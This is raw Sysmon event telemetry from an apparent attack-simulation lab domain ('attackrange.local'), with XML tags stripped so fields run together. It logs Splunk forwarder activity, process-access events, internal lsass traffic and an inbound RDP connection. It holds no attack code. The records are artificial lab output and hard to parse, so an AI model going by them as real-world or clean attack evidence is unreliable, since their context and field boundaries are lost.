providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:26.403{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2433A24315A2832E989A303883D45F6,SHA256=69C87F84752497B52D6BE7F9249FE99695D4753907B7054B4BC091F35487486C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:26.403{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACF9E7083283591250BABF71865EFFAF,SHA256=1348CB8A97087BB70CD45899F17E3E4CC98BAE3EF867EA8150210A87444FBDBF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:18.382{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57215-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001047365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:17.791{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net59120-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001047364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:26.036{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\new 1@2021-07-12_074744MD5=BB87A22CABB0E1CBFD2B4B30711AA20C,SHA256=FA6EE1E8A154941D13A0F4520798BEDC4C573EFE7A1DA8CF9B2F30182DF2332E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:27.956{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0439D4DEA899D4E67DEDC25566EC32C,SHA256=3758D5E2D5B4E292B87D5085B81A895559B380CE7893077B2ECAC3F7A1339B8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.754{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEFC52F194919D7FB15E3AC1DA179006,SHA256=7449DEBF502309F1CB57CF61D47E89845981C025BFC42B958D86C9F75F46BD40,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.984{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57215-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 10341000x8000000000000000806899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3CB-60EB-5C79-00000000D001}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.660{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F3CB-60EB-5C79-00000000D001}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.660{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3CB-60EB-5C79-00000000D001}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.661{0C1E0330-F3CB-60EB-5C79-00000000D001}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000806886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.145{0C1E0330-F3CA-60EB-5B79-00000000D001}19401772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.738{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F530D11E441C4D8C8CFE423560061CD,SHA256=02EC65BAC550825FFE24A8A6B2F5CB311F5413E743CF1D48E646256528DFB471,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001047380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 23542300x80000000000000001047379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A04F2F29982E94B5EE676ECFC87DD7D,SHA256=C26FF63B67F753CCEF62639F73FD50B7142895CB1B369DA6639BB5D34B51CDC4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001047377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001047376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001047375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.918{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+1746d2|C:\Windows\System32\windows.storage.dll+174ba6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814 